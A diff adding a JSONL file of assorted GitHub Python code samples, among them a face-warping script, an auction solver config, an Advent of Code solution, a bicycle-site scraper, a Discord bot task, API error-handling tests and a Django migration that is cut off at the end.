diff --git "a/3186.jsonl" "b/3186.jsonl" new file mode 100644--- /dev/null +++ "b/3186.jsonl" @@ -0,0 +1,1591 @@ +{"seq_id":"11404918938","text":"import numpy as np\nimport skimage.io as skio\nimport matplotlib.pyplot as plt\n\nimport utils\nimport face_point_parser as fp\nimport triangulate as tri\nimport transform_midway as trans\n\ndef warp_face_geom(im, pts1, pts2):\n\tpts1 = np.fliplr(pts1)\n\tpts2 = np.fliplr(pts2)\n\tcorners = np.array([[0, 0], [0, im.shape[0]-1], [im.shape[1]-1, 0], [im.shape[1]-1, im.shape[0]-1]])\n\tpts1_corners = np.vstack((pts1, corners))\n\tpts2_corners = np.vstack((pts2, corners))\n\n\ttriangulation = tri.triangulate_scipy(pts2)\n\ttriangulation_corners = tri.triangulate_scipy(pts2_corners)\n\n\t# tri.show_triangles_scipy(joe, joe, triangulation, pts1, pts2)\n\twarped_corners = trans.get_midshape_interp(im/255, pts1_corners, pts2_corners, triangulation_corners)\n\twarped = warped_corners#trans.get_midshape_interp(im/255, pts1, pts2, triangulation)\n\treturn warped, warped_corners\n\ndef warp_face_points(face_points, joe, multiplier=3, point_nums=(6,6), warp_func=np.sqrt):\n\tcenter = (face_points[point_nums[0]]+face_points[point_nums[1]])/2\n\tcentered_points = face_points-center\n\trads = (centered_points[:,0]**2 + centered_points[:,1]**2)**0.5\n\tmean_rad = np.mean(rads)\n\tthetas = np.arctan2(centered_points[:,0], centered_points[:,1])\n\n\twarped_rads = warp_func(rads, thetas, multiplier)\n\n\twarped_carts = np.zeros_like(face_points)\n\twarped_carts[:,0] = warped_rads*np.sin(thetas)#*mean_rad**0.5\n\twarped_carts[:,1] = warped_rads*np.cos(thetas)#*mean_rad**0.5\n\twarped_carts += center\n\n\t#utils.scatter_pts(warped_carts)\n\t#utils.show_image(joe)\n\treturn warped_carts\n\nif __name__ == '__main__':\n\tname = \"yarden\"\n\tjoe = skio.imread(f\"cropped_photos/{name}_cropped.jpg\")\n\tface_points = fp.get_face_points(name)\n\tface_points = face_points/np.array([joe.shape[1]-1, joe.shape[0]-1])\n\t\n\tbarrel = lambda r: np.std(r)*2*np.arcsin(np.abs((r-np.mean(r))/np.std(r)))/np.pi+np.mean(r)\n\texp_barrel = lambda r: r**1.5\n\t\n\tnormal_sqrt = lambda r, theta, m: m*np.sqrt(r)\n\tdef special_sqrt(r, theta, m):\n\t\tnew_r = np.zeros_like(r)\n\t\tnew_r[(theta >= 0)] = r[(theta >= 0)]\n\t\tnew_r[(theta < 0)] = m*np.sqrt(r[theta < 0])\n\t\treturn new_r\n\n\tdef normal_arcsin(r,theta,m):\n\t\treturn m*2*np.arcsin(r*2)/np.pi\n\n\tdef normal_log(r,theta,m):\n\t\treturn np.log(m*r+1)\n\n\tfish_eye = lambda r,theta,m: 2*m*np.sin(theta/2)\n\n\tpts2 = warp_face_points(face_points, joe, multiplier=1, point_nums=(13, 14), warp_func=normal_log)\n\tpts3 = warp_face_points(pts2, joe, multiplier=2, point_nums=(153, 159), warp_func=normal_log)\n\tpts4 = warp_face_points(pts3, joe, multiplier=2, point_nums=(386, 380), warp_func=normal_log)\n\tface_points*=np.array([joe.shape[1]-1, joe.shape[0]-1])\n\tutils.scatter_pts(face_points)\n\tutils.show_image(joe)\n\tpts4*=np.array([joe.shape[1]-1, joe.shape[0]-1])\n\tutils.scatter_pts(pts4)\n\tutils.show_image(joe)\n\twarped, warped_corners = warp_face_geom(joe, face_points, pts4)\n\tutils.show_image(warped)\n\tutils.show_image(warped_corners)\n\n\n\t\n","repo_name":"THE-COB/homunculize-me","sub_path":"face_warp.py","file_name":"face_warp.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"39791439763","text":"import datetime as dt\nimport itertools\nfrom typing import List, Tuple, Dict, Sequence, Union\n\nfrom auction_module 
import auction as au, bidding as bd, winner_determination as wd\nfrom auction_module.request_selection import request_selection as rs, individual as rsi, bundle as rsb, neighbor as rsn\nfrom auction_module.bundle_and_partition_valuation import partition_valuation as pv\nfrom auction_module.bundle_generation import bundle_gen as bg, partition_based_bg as bgp\nfrom routing_module import neighborhoods as nh, tour_construction as cns, metaheuristics as mh\nfrom tw_management_module import tw_offering as two, tw_selection as tws, request_acceptance as ra\n\n\ndef configs():\n \"\"\"\n generate dicts with all parameters are required to initialize a slv.Solver.\n \"\"\"\n\n s_tour_construction: Sequence[cns.VRPTWInsertionConstruction] = [\n # cns.VRPTWMinTravelDistanceInsertion(),\n cns.VRPTWMinTravelDurationInsertion()\n # cns.MinTimeShiftInsertion()\n ]\n\n # t = float('inf') if ut.debugger_is_active() else 5\n t = 2\n s_tour_improvement: Sequence[mh.VRPTWMetaHeuristic] = [\n mh.NoMetaheuristic([nh.NoNeighborhood()], None),\n # mh.LocalSearchFirst([nh.VRPTWMoveDur()], 1),\n # mh.LocalSearchFirst([nh.VRPTWTwoOptDur()], 1),\n # mh.LocalSearchBest([nh.VRPTWMoveDur()], 1),\n # mh.VRPTWVariableNeighborhoodDescent([nh.VRPTWRelocateDur(), nh.VRPTWMoveDur(), nh.VRPTWTwoOptDurMax4()], t),\n # mh.VRPTWSequentialLocalSearch([nh.VRPTWTwoOptDur(), nh.VRPTWMoveDur(), nh.VRPTWRelocateDur()], t)\n ]\n\n s_max_num_accepted_infeasible: Sequence[int] = [0]\n\n s_request_acceptance_attractiveness: Sequence[ra.RequestAcceptanceAttractiveness] = [ra.Dummy()]\n\n s_time_window_length: Sequence[dt.timedelta] = [\n # dt.timedelta(hours=1),\n dt.timedelta(hours=2),\n # dt.timedelta(hours=4),\n # dt.timedelta(hours=8),\n ]\n\n s_time_window_offering: two.TWOfferingBehavior.__class__ = [\n two.FeasibleTW,\n ]\n\n s_time_window_selection: Sequence[tws.TWSelectionBehavior] = [\n tws.UnequalPreference(),\n # tws.UniformPreference(),\n ]\n\n # by setting this to an empty sequence, no collaborative solutions will be generated\n s_num_submitted_requests: Sequence[Union[int, float]] = [\n 0.1,\n 0.2,\n ]\n\n s_request_selection: Sequence[rs.RequestSelectionBehavior.__class__] = [\n rsi.Random,\n rsi.DepotDurations,\n rsi.MarginalCostProxy,\n rsi.EarlyTimeWindow,\n rsn.TemporalSpatialNeighbors,\n ]\n\n s_num_auction_bundles: Sequence[int] = [\n # 50,\n 100,\n # 200,\n # 300,\n # 500\n ]\n\n s_bundle_generation: Sequence[Tuple[bg.BundleGenerationBehavior.__class__, Dict[str, float]]] = [\n (bgp.GeneticAlgorithm, dict(population_size=300,\n num_generations=100,\n mutation_rate=0.5,\n generation_gap=0.9, )\n ),\n # (bgp.BestOfAllPartitions, dict()),\n (bgp.RandomMaxKPartitions, dict()) # currently better than the GA\n ]\n\n s_partition_valuation: Sequence[pv.PartitionValuation.__class__] = [\n # bv.GHProxyPartitionValuation,\n # bv.MinDistancePartitionValuation,\n # bv.MinDurationPartitionValuation,\n pv.SumTravelDurationPartitionValuation,\n # bv.LosSchultePartitionValuation,\n # bv.RandomPartitionValuation,\n ]\n\n s_auction_policy: List[Dict] = [\n {'num_intermediate_auctions': 0, 'num_intermediate_auction_rounds': 0, 'num_final_auction_rounds': 1},\n # {'num_intermediate_auctions': 0, 'num_intermediate_auction_rounds': 0, 'num_final_auction_rounds': 2},\n # {'num_intermediate_auctions': 1, 'num_intermediate_auction_rounds': 1, 'num_final_auction_rounds': 1},\n ]\n\n # ===== Nested Parameter Loops =====\n for tour_construction, tour_improvement, max_num_accepted_infeasible, \\\n request_acceptance_attractiveness, 
time_window_length, time_window_offering, \\\n time_window_selection in itertools.product(s_tour_construction,\n s_tour_improvement,\n s_max_num_accepted_infeasible,\n s_request_acceptance_attractiveness,\n s_time_window_length,\n s_time_window_offering,\n s_time_window_selection\n ):\n\n request_acceptance = ra.RequestAcceptanceBehavior(\n max_num_accepted_infeasible,\n request_acceptance_attractiveness,\n time_window_offering(time_window_length),\n time_window_selection\n )\n\n # ===== Isolated Planning Parameters, no auction =====\n isolated_planning = dict(\n request_acceptance=request_acceptance,\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n num_intermediate_auctions=0,\n intermediate_auction=False,\n final_auction=False,\n )\n yield isolated_planning\n\n # auction-specific parameters\n for num_submitted_requests in s_num_submitted_requests:\n for request_selection in s_request_selection:\n for num_auction_bundles in s_num_auction_bundles:\n for bundle_generation, bundle_generation_kwargs in s_bundle_generation:\n for partition_valuation in s_partition_valuation:\n for auction_policy in s_auction_policy:\n\n # ===== INTERMEDIATE AUCTIONS =====\n if auction_policy['num_intermediate_auctions'] > 0:\n assert num_submitted_requests % 2 == 0\n total_nsr_int = num_submitted_requests // 2\n total_nsr_fin = num_submitted_requests // 2\n\n assert total_nsr_int % auction_policy[\n 'num_intermediate_auctions'] == 0\n nsr_int = total_nsr_int // auction_policy[\n 'num_intermediate_auctions']\n\n assert nsr_int % auction_policy[\n 'num_intermediate_auction_rounds'] == 0\n nsr_int_round = nsr_int // auction_policy[\n 'num_intermediate_auction_rounds']\n\n intermediate_auction = au.Auction(\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n request_selection=request_selection(nsr_int_round),\n bundle_generation=bundle_generation(\n # TODO is it fair to divide by num_int_auctions?\n num_auction_bundles=num_auction_bundles,\n # / auction_policy['num_intermediate_auctions'],\n partition_valuation=partition_valuation(),\n **bundle_generation_kwargs\n ),\n bidding=bd.ClearAndReinsertAll(tour_construction,\n tour_improvement\n ),\n winner_determination=wd.MaxBidGurobiCAP1(),\n # TODO add proper parameter\n num_auction_rounds=auction_policy[\n 'num_intermediate_auction_rounds']\n )\n else:\n total_nsr_fin = num_submitted_requests\n intermediate_auction = False\n\n # ===== FINAL AUCTION =====\n if auction_policy['num_final_auction_rounds'] > 1:\n assert total_nsr_fin % auction_policy[\n 'num_final_auction_rounds'] == 0\n nsr_fin_round = total_nsr_fin // auction_policy[\n 'num_final_auction_rounds']\n else:\n nsr_fin_round = num_submitted_requests\n\n final_auction = au.Auction(\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n request_selection=request_selection(nsr_fin_round),\n bundle_generation=bundle_generation(\n # TODO is it fair to divide by num_int_auctions?\n num_auction_bundles=num_auction_bundles,\n # / auction_policy['num_intermediate_auctions'],\n partition_valuation=partition_valuation(),\n **bundle_generation_kwargs\n ),\n bidding=bd.ClearAndReinsertAll(tour_construction,\n tour_improvement\n ),\n winner_determination=wd.MaxBidGurobiCAP1(),\n num_auction_rounds=auction_policy[\n 'num_final_auction_rounds']\n )\n\n collaborative_planning = dict(\n request_acceptance=request_acceptance,\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n num_intermediate_auctions=auction_policy[\n 
'num_intermediate_auctions'],\n intermediate_auction=intermediate_auction,\n final_auction=final_auction,\n )\n\n yield collaborative_planning\n","repo_name":"Eddbaggio/CR_AHD","sub_path":"Python/src/cr_ahd/solver_module/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18805447964","text":"adjacents = (\n ( 1, 0, 0),\n (-1, 0, 0),\n ( 0, 1, 0),\n ( 0,-1, 0),\n ( 0, 0, 1),\n ( 0, 0,-1))\n\n\ndef new_coord(coord, adj):\n return (\n coord[0] + adj[0],\n coord[1] + adj[1],\n coord[2] + adj[2])\n\n\ndef adjacent_coords(coord):\n for adjacent in adjacents:\n yield new_coord(coord, adjacent)\n\n\ndef load_cubes(data):\n all_cubes = []\n for line in data:\n cube = tuple(map(int, line.split(',')))\n all_cubes.append(cube)\n \n return all_cubes\n\n\ndef group_cubes(all_cubes):\n cube_groups = []\n while len(all_cubes) > 0:\n cube_stack = [all_cubes.pop(0)]\n cube_group = []\n while len(cube_stack) > 0:\n cube = cube_stack.pop(0)\n cube_group.append(cube)\n\n for adj_cube in adjacent_coords(cube):\n if adj_cube in all_cubes:\n all_cubes.remove(adj_cube)\n cube_stack.append(adj_cube)\n \n cube_groups.append(cube_group)\n\n return cube_groups\n\n\ndef count_sides_a(cubes):\n sides = 0\n for cube in cubes:\n for adj_cube in adjacent_coords(cube):\n if adj_cube not in cubes:\n sides += 1\n\n return sides\n\n\ndef count_sides_b(cubes, air_cubes):\n sides = 0\n for cube in cubes:\n for adj_cube in adjacent_coords(cube):\n if adj_cube in cubes:\n continue\n\n if adj_cube not in air_cubes:\n continue\n\n sides += 1\n\n return sides\n\n\ndef simulate(data):\n all_cubes = load_cubes(data)\n \n max_x = max((cube[0] for cube in all_cubes)) + 1\n max_y = max((cube[1] for cube in all_cubes)) + 1\n max_z = max((cube[2] for cube in all_cubes)) + 1\n print(max_x, max_y, max_z)\n\n air_cubes = set()\n air_stack = [(-1, -1, -1)]\n seen_cubes = set(air_stack[0])\n\n while len(air_stack) > 0:\n cube = air_stack.pop(0)\n air_cubes.add(cube)\n seen_cubes.add(cube)\n\n for adj_cube in adjacent_coords(cube):\n if adj_cube in all_cubes:\n continue\n\n if adj_cube in seen_cubes:\n continue\n\n if not (-1 <= adj_cube[0] <= max_x):\n continue\n\n if not (-1 <= adj_cube[1] <= max_y):\n continue\n\n if not (-1 <= adj_cube[2] <= max_z):\n continue\n\n seen_cubes.add(adj_cube)\n air_stack.append(adj_cube)\n \n print(len(air_cubes))\n\n cube_groups = group_cubes(all_cubes)\n\n print(len(cube_groups))\n\n total_sides_a = 0\n total_sides_b = 0\n for cube_group in cube_groups:\n sides_a = count_sides_a(cube_group)\n sides_b = count_sides_b(cube_group, air_cubes)\n\n print(len(cube_group), sides_a, sides_b)\n total_sides_a += sides_a\n total_sides_b += sides_b\n\n # code here\n return total_sides_a, total_sides_b\n\n\ndef get_data(file_name):\n data = []\n with open(file_name, 'rt') as fh:\n for line in fh:\n data.append(line.strip())\n \n return data\n\n\ndef main():\n data = get_data('data/input_018.txt')\n results = simulate(data)\n print(results[0], '==' , 3396)\n print(results[1], '==' , 2044)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"kloptops/AdventOfCode","sub_path":"2022/aoc_018.py","file_name":"aoc_018.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72731382032","text":"'''\n정점 번호 V = 1 ~ (E+1)\n간선 수\n부모-자식 순\n4\n1 2 1 3 3 4 3 5\n'''\n\n\ndef preorder(n): # 전위순회\n if 
n:\n        print(n) # visit(n)\n        preorder(ch1[n])\n        preorder(ch2[n])\n\n\ndef inorder(n): # inorder traversal\n    if n:\n        inorder(ch1[n])\n        print(n) # visit(n)\n        inorder(ch2[n])\n\n\ndef postorder(n):\n    if n:\n        postorder(ch1[n])\n        postorder(ch2[n])\n        print(n) # visit(n)\n\n\nE = int(input())\narr = list(map(int, input().split()))\nV = E + 1\nroot = 1\n# store each child's number indexed by its parent\nch1 = [0] * (V + 1)\nch2 = [0] * (V + 1)\nfor i in range(E):\n    p, c = arr[i*2], arr[i*2 + 1]\n    if ch1[p] == 0:\n        ch1[p] = c\n    else:\n        ch2[p] = c\n\ninorder(root)\n","repo_name":"DY-Shin/TIL","sub_path":"Algorithm/tree1.py","file_name":"tree1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"5456322803","text":"from pandas.core.indexes import base\nfrom bn_zest import BayesianNetwork\nimport os\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nMODELS_DIR = os.path.join(ROOT_DIR, 'models')\nASSETS_DIR = os.path.join(ROOT_DIR, 'assets')\n\nmodel = BayesianNetwork.from_cmpx(os.path.join(MODELS_DIR, 'bendi_bn_2020_07_21.cmpx'))\n\ndef npt_to_html(variable, **kwargs):\n    return variable.npt.to_df().to_html(**kwargs)\n\n\nhtml_tables = (npt_to_html(variable, bold_rows=True, border=1) for variable in model.variables)\n\nwith open(os.path.join(ASSETS_DIR, 'base.html'), 'r') as html_file:\n\n    base_string = html_file.read()\n\ntables_string = '\\n
\\n'.join(html_tables)\n\nbase_string = base_string.replace(r'{{content}}', tables_string)\n\nwith open(os.path.join(ASSETS_DIR, 'tables.html'), 'w') as output_file:\n\n output_file.write(base_string)","repo_name":"cjoyneruk/bn_zest","sub_path":"examples/npt_export.py","file_name":"npt_export.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13543046695","text":"import asyncio\nfrom typing import Union, Optional\n\nimport discord\nfrom discord import Thread\nfrom discord.abc import PrivateChannel\nfrom discord.ext import commands\nfrom discord import guild\n\nfrom data import db\n\n\nasync def refresh_verification(bot: commands.Bot):\n while True:\n for ukey in db.database.players.keys():\n user = db.database.Player(ukey)\n chnId: Optional[int] = user.vf_message_channel\n msgId = user.vf_message_id\n\n if (chnId is None) or (msgId is None):\n continue\n\n print(f\"Checking user {ukey}\")\n try:\n chn: Union[guild.GuildChannel, PrivateChannel, Thread] = await bot.fetch_channel(chnId)\n except discord.Forbidden:\n user.vf_message_channel = None\n print(f\"Channel cannot be accessed\")\n return\n\n if chn is None:\n user.vf_message_channel = None\n print(f\"Channel not found\")\n \n else:\n try:\n await chn.fetch_message(msgId)\n except discord.DiscordException:\n user.vf_message_id = None\n print(f\"Message not found\")\n\n await asyncio.sleep(5 * 60)\n","repo_name":"abiriadev/rabirobot","sub_path":"coroutines.py","file_name":"coroutines.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"16547596297","text":"import logging\nimport requests\nimport json\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\nheader = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}\nLOG_FORMAT = \"%(levelname)s %(asctime)s - %(message)s\"\n\nlogging.basicConfig(filename=\"./giant.log\", level=logging.DEBUG, format=LOG_FORMAT, filemode='w')\nlogger = logging.getLogger()\n\n\nclass Bike:\n def __init__(self, name, price, price_str, specs):\n self.name = name\n self.price = price\n self.price_str = price_str\n self.specs = specs\n\n def __repr__(self):\n from pprint import pformat\n return pformat(vars(self))\n\n\ndef get_bike_stats_for_bike_site(rel_link: str):\n base_link = \"https://www.giant-bicycles.com\"\n link = base_link + rel_link\n\n soup = BeautifulSoup(requests.get(link).text, features=\"html.parser\")\n logging.debug(soup)\n\n price_str = soup.find(\"div\", {\"class\": \"price\"}).text\n price = price_str\n price = price.replace(\"€\", \"\")\n price = price.replace(\".\", \"\")\n price = price.replace(\" \", \"\")\n price = int(price)\n\n spec_table = soup.find(\"ul\", {\"class\": \"specifications\"})\n spec_table = spec_table.find_all(\"li\", {\"class\", \"datarow\"})\n specs = []\n for i in spec_table:\n label = i.find(\"div\", {\"class\", \"label\"}).text\n value = i.find(\"div\", {\"class\", \"value\"}).text\n specs.append({label: value})\n return Bike(rel_link, price, price_str, specs)\n\n\ndef check_multiple(link: str):\n \"\"\" gets something like https://www.giant-bicycles.com/de/trance-x-1-2023 \"\"\"\n soup = BeautifulSoup(requests.get(link).text, features=\"html.parser\")\n logging.debug(soup)\n\n just_one = soup.find(\"div\", {\"class\": \"breadcrumbs\"})\n if just_one is None:\n # if there is 
more than one bike on the site return the bike sites\n logging.debug(\"more than one\")\n bikes = soup.find_all(\"a\", {\"class\": \"textlink track-GA4-event\"})\n return bikes\n logging.debug(\"just one\")\n return 0\n\n\ndef parse_site(link: str):\n logging.debug(link)\n soup = BeautifulSoup(requests.get(link).text, features=\"html.parser\")\n logging.debug(soup)\n\n table_of_bikes = soup.find(\"div\", {\"id\": \"productsContainer\"})\n bikes_on_table = table_of_bikes.find_all(\"a\", {\"class\": \"textlink track-GA4-event\"})\n rel_bike_sites = get_rel_bike_sites(bikes_on_table)\n\n all_bikes = []\n\n for i in rel_bike_sites:\n all_bikes.append(get_bike_stats_for_bike_site(i))\n all_bikes.sort(key=lambda x: x.price)\n for i in all_bikes:\n pprint(i)\n print()\n\n\ndef get_rel_bike_sites(bike_table) -> []:\n names = []\n base_link = \"https://www.giant-bicycles.com\"\n for i in bike_table:\n full_bike_name = parse_bike_name(i)\n if full_bike_name == \"\":\n continue\n bike_link = base_link + full_bike_name # check if multiple\n\n multiple = check_multiple(bike_link)\n if multiple == 0: # just one\n names.append(full_bike_name)\n else:\n for j in multiple:\n full_bike_name = parse_bike_name(j)\n if full_bike_name == \"\":\n continue\n names.append(full_bike_name)\n return names\n\n\ndef parse_bike_name(bike_html):\n bike = bike_html[\"data-ga4_items\"]\n bike = bike.strip('[]')\n bike = json.loads(bike)\n # {'item_id': 'series-1175', 'item_name': 'reign advanced pro', 'index': 3, 'item_brand': 'giant', 'item_category': 'bikes', 'item_category2': 'mountain bikes', 'item_category3': 'full suspension', 'price': 5299.0, 'discount': 0.0, 'quantity': 1}\n bike_name = bike[\"item_name\"]\n if bike_name == \"\":\n return bike_name\n full_bike_name = bike_html[\"href\"]\n return full_bike_name\n\n\ndef main():\n links = [\n \"https://www.giant-bicycles.com/de/bikes/mountain/full-suspension\"\n ]\n for i in links:\n parse_site(i)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ammernico/giant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34518109020","text":"import bpy\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef enforce_constraint_order(armature, action):\n bones = get_affected_bones(armature, action)\n current_active_bone = armature.bones.active\n for bone in bones:\n constraints = bone.constraints\n\n action_constraints = [c.name for c in constraints if c.type == \"ACTION\"]\n translate_constraints = sorted(\n [c for c in action_constraints if \"translate\" in c]\n )\n rotate_scale_constraints = sorted(\n [c for c in action_constraints if \"rotate_scale\" in c]\n )\n unsplit_constraints = sorted(\n list(\n set(action_constraints)\n - set(translate_constraints)\n - set(rotate_scale_constraints)\n )\n )\n\n ordered_action_names = (\n translate_constraints + rotate_scale_constraints + unsplit_constraints\n )\n\n armature.bones.active = bone.bone\n reorder_constraints(bone, ordered_action_names)\n armature.bones.active = current_active_bone\n\n\ndef get_affected_bones(armature, action):\n armature_ob = bpy.data.objects[armature.name]\n return [b for b in armature_ob.pose.bones if b.name in action.groups]\n\n\ndef reorder_constraints(bone, ordered_action_names):\n def sort_constraint_as_actions(item):\n return ordered_action_names.index(item.name)\n\n constraints = [c for c in bone.constraints if c.type == \"ACTION\"]\n\n 
ordered_constraints = sorted(constraints, key=sort_constraint_as_actions)\n\n for expected_index, constraint in enumerate(ordered_constraints):\n\n ctx = bpy.context.copy()\n ctx[\"constraint\"] = constraint\n\n current_index = bone.constraints.find(constraint.name)\n if current_index > expected_index:\n while current_index != expected_index:\n previous_index = current_index\n bpy.ops.constraint.move_up(\n ctx, constraint=constraint.name, owner=\"BONE\"\n )\n current_index = bone.constraints.find(constraint.name)\n if previous_index == current_index:\n raise Exception(\n \"Failed to move the constraint {}. The bone {} is probably hidden\".format(\n constraint.name, bone.name\n )\n )\n elif current_index < expected_index:\n while current_index != expected_index:\n previous_index = current_index\n bpy.ops.constraint.move_down(\n ctx, constraint=constraint.name, owner=\"BONE\"\n )\n current_index = bone.constraints.find(constraint.name)\n if previous_index == current_index:\n raise Exception(\n \"Failed to move the constraint {}. The bone {} is probably hidden\".format(\n constraint.name, bone.name\n )\n )\n","repo_name":"Muream/actionman","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"83"} +{"seq_id":"10456510944","text":"from openapi_server.apis.utils import error_handling\nfrom fastapi.exceptions import HTTPException\nfrom caselawclient.Client import (\n MarklogicUnauthorizedError,\n MarklogicValidationFailedError,\n)\nfrom unittest.mock import Mock\nimport pytest\n\n\ndef test_error_handling_no_exception():\n def example():\n with error_handling():\n return 4\n\n assert example() == 4\n\n\ndef test_error_handling_python_error(caplog):\n \"\"\"\n Given you will get a standard Python exception\n When using error_handling\n Then the error response:\n contains a very generic error with no contents\n has a relevant status code\n And outputs the message and traceback to the logs\n \"\"\"\n\n def example():\n with error_handling():\n 1 / 0\n\n with pytest.raises(HTTPException) as ex:\n example()\n assert ex.value.detail == \"An unknown error occurred outside of Marklogic.\"\n assert ex.value.status_code == 500\n assert \"division by zero\" in caplog.text\n assert \"1 / 0\" in caplog.text\n\n\ndef test_validation_error(caplog):\n \"\"\"\n Given you will get a validation MarklogicAPIError exception\n When using error_handling\n Then the error response:\n contains the marklogic error message\n is the default message\n has a relevant status code\n And outputs the message to the logs\n \"\"\"\n\n def example():\n e = MarklogicValidationFailedError(\"error_msg\")\n e.response = Mock()\n e.response.content = b'a message from marklogic' # noqa:E501\n\n with error_handling():\n raise e\n\n with pytest.raises(HTTPException) as ex:\n example()\n\n assert ex.value.detail == \"a message from marklogic\"\n assert ex.value.status_code == 422\n assert \"error_msg\" in caplog.text\n\n\ndef test_non_validation_error(caplog):\n \"\"\"\n Given you will get a non-validation MarklogicAPIError exception\n When using error_handling\n Then the error response:\n does not contain the marklogic error message\n is the default message\n has a relevant status code\n And outputs the message to the logs\n \"\"\"\n\n def example():\n e = MarklogicUnauthorizedError(\"error_msg\")\n e.response = Mock()\n e.response.content = b'a message from marklogic' # noqa:E501\n\n with error_handling():\n raise 
e\n\n with pytest.raises(HTTPException) as ex:\n example()\n\n assert \"a message from marklogic\" not in ex.value.detail\n assert \"Your credentials are not valid\" in ex.value.detail\n assert ex.value.status_code == 401\n assert \"error_msg\" in caplog.text\n","repo_name":"nationalarchives/ds-caselaw-privileged-api","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31674736140","text":"\"\"\"\nLikes model class\n\"\"\"\n\nfrom flickipedia.model.base_model import BaseModel\nfrom flickipedia.config import log, schema\nfrom sqlalchemy.sql import func\n\n\nclass LikeModel(BaseModel):\n\n def __init__(self):\n super(LikeModel, self).__init__()\n\n def get_like(self, user_id, article_id, photo_id):\n \"\"\" Retrieve whether an object has been liked \"\"\"\n schema_obj = getattr(schema, 'Like')\n query_obj = self.io.session.query(schema_obj).filter(\n schema_obj.user_id == user_id,\n schema_obj.article_id == article_id,\n schema_obj.photo_id == photo_id,\n )\n res = self.alchemy_fetch_validate(query_obj)\n if len(res) > 0:\n return res[0]\n else:\n return None\n\n def get_likes_article_photo(self, article_id, photo_id, count=False):\n \"\"\" Retrieve the full set of endorsements for a article-photo \"\"\"\n schema_obj = getattr(schema, 'Like')\n res = self.io.session.query(schema_obj).filter(\n schema_obj.article_id == article_id,\n schema_obj.photo_id == photo_id,\n )\n if count:\n return res.count()\n else:\n return res.all()\n\n def insert_like(self, user_id, article_id, photo_id):\n return self.io.insert('Like', user_id=user_id,\n article_id=article_id, photo_id=photo_id)\n\n def delete_like(self, like_obj):\n return self.io.delete(like_obj)\n\n def get_most_likes(self, limit):\n \"\"\" Return likes counts by photo and article\"\"\"\n schema_obj = getattr(schema, 'Like')\n query_obj = self.io.session.query(\n schema_obj.photo_id, schema_obj.article_id, func.count(\n schema_obj.photo_id).label('cnt')).group_by(\n schema_obj.photo_id, schema_obj.article_id).order_by(\n 'cnt DESC').limit(limit)\n res = self.alchemy_fetch_validate(query_obj)\n return res\n\n","repo_name":"rfaulkner/Flickipedia","sub_path":"flickipedia/model/likes.py","file_name":"likes.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"70676821393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MeasuredTemp',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('measuredOn', models.DateTimeField(auto_now_add=True)),\n ('temperature', models.FloatField(default=-99.0)),\n ('manual', models.BooleanField(default=False)),\n ('targetTemperature', models.FloatField(default=-99.0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SavingHistory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('startDate', models.DateTimeField()),\n ('endDate', models.DateTimeField()),\n ('saving', models.FloatField(default=None, null=True)),\n 
